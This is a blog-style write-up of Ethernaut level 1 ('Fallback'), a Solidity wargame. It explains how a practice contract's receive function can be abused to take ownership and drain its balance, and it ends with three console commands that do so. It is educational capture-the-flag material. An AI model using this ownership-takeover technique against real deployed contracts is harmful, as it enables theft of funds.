Ethernaut — Web3/Solidity based wargame — Level 1 with solution

Hello, today we gonna talk about Ethernaut:
https://ethernaut.openzeppelin.com/

The Ethernaut is a Web3/Solidity based wargame inspired on overthewire.org, played in the Ethereum Virtual Machine. Each level is a smart contract that needs to be ‘hacked’. The game is 100% open source and all levels are contributions made by other players.

First level is called fallback.

What fallback means in solidity?

The fallback function is executed on a call to the contract if none of the other functions match the given function signature, or if no data was supplied at all and there is no receive Ether function. The fallback function always receives data, but in order to also receive Ether it must be marked payable — this is how solidity docs describe it.

To learn more about fallback and its different types check this (my article about fallback that will be written soon)

Above is a contract code that is prepared for us to “hack”.

Target:
- claiming ownership of the contract
- reducing its balance to 0

Tips from level authors:
- What are fallbacks methods, when to use them
- Ways to send ether to a contract
- Ether decimals

Now I will provide solution for this problem, my tip for you is to at least try to solve it by yourself.

There are 2 possible solutions, but only 1 is practical:
a) Sending 1000 eth in 1 mln txs (because u can send only less than 0.001 ether with 1 contribute function call), Rinkeby produce 1 block every 15 seconds, which means it will take more 173 days to accomplish this and you would need more than 1000 rinkeby eth :) (1 mln txs * 15 s block time) / (86400 seconds in a day) ~= 173 days

b) There are 2 functions in this contract that let us change owner
- Contribute() — if statement inside it won’t let us to change owner, but we can send come ether (less than 0.001) and “contribute” to this contract which means binding our address to ether we have sent by using mapping named contributions.
- receive() — fallback function which let contract receive ether the same way that normal wallet address can receive it. This function will check if we are on contributions list (by checking if our address maps to value above 0), so we can send 1 wei using Contribute(), then send 1 wei to the contract as a normal transfer (Contract.send(1)), and after it we are finally owners.

Now withdrawing ethereum is trivial, so I won’t describe it.

Console commands to finish exercise are:

contract.contribute({‘value’: 1})
contract.send(1)
contract.withdraw()

That’s all for today, thanks for your attention. If you think I can improve something in my texts or explain topics further, leave a command.